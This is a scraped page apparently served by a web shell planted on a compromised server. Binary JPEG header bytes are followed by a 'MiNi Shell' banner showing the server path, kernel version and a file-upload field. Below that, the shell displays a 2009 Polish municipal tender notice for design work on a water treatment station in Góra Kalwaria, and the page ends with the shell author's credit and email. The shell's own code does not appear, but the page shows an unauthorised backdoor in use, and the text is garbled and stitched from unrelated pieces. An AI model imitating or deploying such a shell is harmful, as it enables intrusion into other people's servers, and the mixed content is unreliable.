JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/368380-N-2009.html

<p class="kh_header"><b>Góra Kalwaria: Przetarg nieograniczony na (usługa) opracowanie dokumentacji technicznej - rozbudowa stacji uzdatniania wody w Sobikowie.</b><br>
<b>Numer ogłoszenia: 368380 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Góra Kalwaria , ul. 3 Maja 10, 05-530 Góra Kalwaria, woj. mazowieckie, tel. 0-22/7273414, faks 0-22/7273414.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorakalwaria pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na (usługa) opracowanie dokumentacji technicznej - rozbudowa stacji uzdatniania wody w Sobikowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Wykonanie inwentaryzacji stanu istniejącego (dwustopniowy układ pompowania  o wydajności Qmax = 90 m3(h z dwiema studniami głębinowymi o wydajności po 90 m3(h każda) SUW w zakresie niezbędnym dla realizacji prac projektowych.  
Podanie wydajności  wody określonej przy nowym układzie technologicznym odnoszą się do ilości wody uzdatnionej.
2.Wykonanie analizy technologicznej i operatu wodnoprawnego
3.Wykonanie dokumentacji technicznej rozbudowy z uwzględnieniem:
        - nowego układu technologiczny o wydajności + 90 m3(h (zestaw pionowych filtrów 
          pośpiesznych ciśnieniowych zamkniętych, pompownia drugiego stopnia, zbiornik
          kontaktowy, układ sterowania z monitoringiem),
        - instalacji odprowadzania wód popłucznych,
        - zbiorników retencyjnych wody uzdatnionej (ok. 400 m3),Podane wielkości zbiorników retencyjnych mogą ulec zmianie po dokonaniu szczegółowego bilansu zapotrzebowania wody. Wykonanie w technologi monolitycznej żelbetowej
nowej studni głębinowej (ok. 100m3(h), wzmianka o nowych studniach odnosi się tylko do projektu na  nowy odwiert, (o ile po dokonaniu bilansu zaistnieje taka potrzeba).
Zamawiający przewiduje konieczność zaprojektowania na w(w obiektach agregatu prądotwórczego.
4.  Wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych,
5.  Wykonanie przedmiarów i kosztorysów inwestorskich
6.  Uzyskanie pozwolenia na wodnoprawnego
7.  Uzyskanie pozwolenia na budowę
8. Wykonawca zobowiązany jest do:
Zapoznania się ze stanem istniejącym SUW(wizja lokalna w terenie, analiza istniejącej dokumentacji technicznej w tym dokumentacja projektowa, hydrologiczna, decyzje wodno prawne).
Wykonanie niezbędnej inwentaryzacji rozbudowywanej SUW w zakresie niezbędnym dla realizacji prac projektowych.
Przeprowadzenia analizy w zakresie mocy zamówionej na energię elektryczną, niezbędną do zasilania SUW.
Rozważenia konieczności rozbudowy w zakresie budynku SUW i zbiorników retencyjnych na wodę uzdatnioną.
Zaprojektowania układu technologicznego opartego na zastosowaniu filtrów ciśnieniowych zamkniętych oraz pompowaniu dwustopniowym.
Uwzględnienia w projekcie rozbudowy zachowania ciągłości pracy SUW na dotychczasowych parametrach wydajnościowych z przerwami nie dłuższymi niż 2 godziny.
Uwzględnienia przy projektowaniu wymogu zachowania jednolitego systemu pracy SUW.
Uwzględnienia w projekcie wyposażenia SUW w monitoring z wizualizacją i możliwością sterowania oraz przesyłania danych do i z biura (ul. Kalwaryjska 1 w Górze Kalwarii).
Wykonania projektu zagospodarowania terenu SUW (drogi dojazdowe, chodniki itp.).
9. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dla zadania pn.
          Rozbudowa SUW w Sobikowie, gm. Góra Kalwaria.
Stan istniejący obejmuje SUW z dwustopniowym układem pompowania o wydajności Qmax = 90 m3(h z dwiema studniami głębinowymi o wydajności 90 m3/h każda.
10. Zakres rzeczowy zamówienia obejmuje opracowanie dokumentacji projektowej zawierającej:
mapę do celów projektowych w skali 1:500,
projekt budowlany i wykonawczy rozbudowy stacji wodociągowej obejmujący:
a) branżę budowlaną, technologiczną, instalacyjną i elektryczną, sieci zewnętrzne,
b) ocenę stanu technicznego stacji wodociągowej,
c) adaptację i rozbudowę budynku stacji uzdatniania wody,
d) nowy układ technologiczny o wydajności + 90m3(h (zestaw pionowych filtrów pośpiesznych
e)   ciśnieniowych zamkniętych, pompownia drugiego stopnia, zbiornik kontaktowy, układ
sterowania z monitoringiem),  spełniający wymogi Rozporządzenia Ministra Zdrowia z dnia  29 marca 2007 r. . w sprawie wymagań dotyczących jakości wody przeznaczonej do spożycia przez ludzi  (Dz. U.  Z 2007 r.)
f) instalacje odprowadzania wód popłucznych,
g) zbiornik retencyjny wody uzdatnionej (400 m3),
h) nową studnię głębinową (ok. 100 m3(h),
11. Projekt wykonawczy należy opracować w stopniu dokładności niezbędnym do sporządzenia          przedmiaru robót, kosztorysu inwestorskiego oraz realizacji robót budowlanych.
 informację o problematyce bezpieczeństwa i ochrony zdrowia w trakcie wykonywania  robót budowlanych objętych opracowaniem projektowym,
 specyfikację techniczną wykonania i odbioru robót budowlanych,
 kosztorysy, w tym kosztorys inwestorski i ślepy (również w wersji elektronicznej,
inne elementy opracowania jak np. analiza technologiczna, operat wodnoprawny, uzgodnienia i zezwolenia, niezbędne do prawidłowego wykonania dokumentacji projektowej oraz otrzymania decyzji pozwolenia wodnoprawnego i pozwolenia na budowę, włącznie z uzyskaniem tej decyzji stanowiącej integralną część zadania.
12. Dokumentacja projektowa wraz z pozostałymi dokumentami winna być wykonana zgodnie z zasadami wiedzy technicznej, obowiązującymi normami i przepisami oraz posiadać wszystkie      wymagane przepisami uzgodnienia, opinie, oświadczenia, decyzje oraz pozwolenie na budowę.      Koszty uzyskania wszystkich uzgodnień i decyzji obciążają Wykonawcę dokumentacji      stanowiącej przedmiot zamówienia.
13.  Ewentualne poprawki i uzupełnienia opracowania Wykonawca wykona na własny koszt  w ramach rękojmi jakości swoich usług oraz w ramach udzielonej gwarancji.

Dokumentacja powinna zawierać oryginały wszelkich wymaganych opinii, uzgodnień i sprawdzeń potwierdzających prawidłowość i zgodność z przepisami rozwiązań zawartych w projekcie, jak również projekt zagospodarowania wykonany na oryginalnej mapie do celów projektowych.
Dokumentację należy przygotować zgodnie z wykazem:
ZZK, specyfikacje techniczne, kosztorys inwestorski, kosztorys szczegółowy, przedmiary robót - w 3 egz.
 pozostała dokumentacja w 6 egz.
 wersja elektroniczna dokumentacji na CD w 1 egz. w formacie ogólnodostępnym (wielkość jednego pliku max 10 MB)
    Kosztorys inwestorski i przedmiar w wersji elektronicznej w programie  współpracującym z Normą Pro. 
Zamawiający oczekuje dokumentacji wielobranżowej w zakresie pozwalającym na uzyskanie pozwolenia na budowę i ogłoszenie przetargu. 
Dokumentację projektową-kosztorysową należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003r. w spawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 poz. 1133 z 2003r. z póź. zm.), Rozporządzeniem Ministra Infrastruktury z dnia 12.04.2002r. w spawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75 poz. 690 z 2002r. z póź. zm.). Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 02.03.1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43 z 1999r., poz. 430 z póz. zm.), Ustawą z dnia 07 lipca 1994r. - Prawo Budowlane  (tekst jednolity Dz. U. z 2006 r. Nr 156, poz. 1118 z póź. zm.), Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 16.06.2003r. (Dz. U. Nr 121, poz. 1137,1138,1139 z póź. zm.).
Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz. U. Nr 130, poz. 1389), Rozporządzeniem Ministra Infrastruktury z dnia 06.11.2008r. w sprawie metodologii obliczania charakterystyki energetycznej budynku (Dz. U. z 2008r. Nr 201, poz. 1240) oraz innymi uwarunkowaniami prawnymi regulującymi projektowanie i realizacje inwestycji budowlanych, a także przepisami szczególnymi, polskimi normami wprowadzającymi normy europejskie lub europejskie aprobaty techniczne.
Warunkiem koniecznym przy wykonywaniu projektu jest posiadanie odpowiednich uprawnień zawodowych o których mowa w art. 14   ust. 1 pkt. 1 w zakresie określonym w art. 14 ust. 3 pkt.l ustawy z dnia 7 lipca 1994r. - Prawo Budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156, poz. 1118 z póź, zm.), a także przynależność do izby samorządu zawodowego.
Wszystkie projekty muszą być skoordynowane międzybranżowo i posiadać niezbędne uzgodnienia, a kserokopie dokumentów dołączonych do projektów potwierdzone za zgodność z oryginałem.
i)Wykonawca przekaże autorskie prawa majątkowe do opracowania objętego zamówieniem.
j)Dokumentacja techniczna powinna być uzgadniana z Zamawiającym i użytkownikiem SUW (ZGK ul. Św. Antoniego 1 w Górze Kalwarii) w zakresie rozwiązań technicznych materiałowych i kosztowych.
k)Wszystkie materiały winny być dostarczone w formie papierowej.
Na każdym etapie projektowania będzie wymagane zachowanie ścisłego kontaktu z Zamawiającym.
l)Wszelkie koszty związane z realizacją przedmiotu zamówienia obciążają wykonawcę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział (złożyć ofertę) Wykonawcy spełniający wszystkie wymogi  określone w Specyfikacji Istotnych Warunków Zamówienia przedmiotowego postępowania tj:
1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli obowiązek posiadania takich uprawnień ustawy nakładają 
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a) wykażą, że osoby które będą uczestniczyć w wykonywaniu zamówienia (projektanci i osoby sprawdzające) wszystkich branż biorących udział w procesie projektowania posiadają odpowiednie uprawnienia zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity; Dz. U. z 2006 r. Nr 156, poz. 1118). Wymagani są w szczególności projektanci i sprawdzający z uprawnieniami w branżach:  instalacji sanitarnych, instalacji elektrycznych. Osoby te muszą należeć do Okręgowej Izby Inżynierów Budownictwa (lub Architektów) i posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej.
b) W okresie ostatnich trzech lat zrealizowali minimum 1 zamówienie związane z zaprojektowaniem działającej min.1 stacji uzdatniania wody o wydajności co najmniej 50 m3/h (otrzymującej parametry wyjściowe wody  spełniający wymogi Rozporządzenia Ministra Zdrowia z dnia  29 marca 2007 r. . w sprawie wymagań dotyczących jakości wody przeznaczonej do spożycia przez ludzi                      (Dz. U.  Z 2007 r.) zgodne z projektem). Wykazane opracowania muszą być poparte dokumentami wystawionymi przez Inwestora potwierdzającymi, że zostały wykonane z należytą starannością oraz od poprzednio zamawiającego Zamawiającego potwierdzenie działania stacji (otrzymującej parametry wyjściowe wody  spełniające wymogi Rozporządzenia Ministra Zdrowia z dnia  29 marca 2007 r. . w sprawie wymagań dotyczących jakości wody przeznaczonej do spożycia przez ludzi                      (Dz. U.  Z 2007 r.)).. 
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia: 
1.5. W przypadku wspólnego ubiegania się o udzielenie zamówienia (art. 23 Pzp), Wykonawcy muszą: 
a) ustanowić pełnomocnika (patrz punkt 16a Rozdziału II Informacje ogólne), 
b) każdy z Wykonawców oddzielnie musi spełniać wymóg, że nie podlega wykluczeniu na podstawie art. 24 ustawy, 
2. Wykluczeniu z postępowania podlegają Wykonawcy w przypadkach określonych w art. 24 ustawy Prawo Zamówień Publicznych. 
3. Ocena spełniania powyższych warunków dokonywana będzie w oparciu o złożoną ofertę i załączniki do niej (w/g zasady spełnia/nie spełnia). Nie spełnienie jakiegokolwiek warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Formularz ofertowy - zał. 1; W przypadku podmiotów występujących wspólnie oświadczenie woli składa pełnomocnik reprezentujący Wykonawców w postępowaniu.
Oświadczenie wykonawcy o spełnienie warunków określonych art. 22 Ustawy Pzp - zał. 2; W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy w zakresie w jakim spełniają warunki udziału w postępowaniu.
Oświadczenie wykonawcy o informacjach stanowiących tajemnicę przedsiębiorstwa - zał. 3 W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy,
aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy,
dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób podpisujących ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych, 
aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy,
 wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć wykonaniu zadania, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówieni, a także zakresu wykonywanych przez nie czynności  - załącznik numer 4; W przypadku podmiotów występujących wspólnie dokument ten składają Ci Wykonawcy, którzy spełniają warunek udziału w postępowaniu.
pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zadania, jeżeli w wykazie, o którym mowa w pkt. 8 wykonawca wskazał osoby, którymi będzie dysponował. W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy,
dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  (uprawnienia + wpis do Okręgowej Izby Inżynierów Budownictwa) /dotyczy kierowników budowy/,  W przypadku podmiotów występujących wspólnie dokument ten składają Ci Wykonawcy, którzy spełniają warunek udziału w postępowaniu,
Wykazu wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca - załącznik numer 5. Wykaz winien zawierać tylko roboty potwierdzające spełnienie warunku. W przypadku podmiotów występujących wspólnie dokument ten składają Ci Wykonawcy, którzy spełniają warunek udziału w postępowaniu,
Dokumenty potwierdzające, że roboty wymienione w zał. Nr 5 zostały wykonane z należytą starannością,
dokument od poprzednio Zamawiającego potwierdzający działanie stacji i potwierdzający otrzymywanie wody o parametrach wyjściowych zgodnych z  wymogi Rozporządzenia Ministra Zdrowia z dnia  29 marca 2007 r. . w sprawie wymagań dotyczących jakości wody przeznaczonej do spożycia przez ludzi (Dz. U.  Z 2007 r.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gorakalwaria.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy
ul. 3-go Maja 10
05-530 Góra Kalwaria
Referat Inwestycji.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy
ul. 3-go Maja 10
05-530 Góra Kalwaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com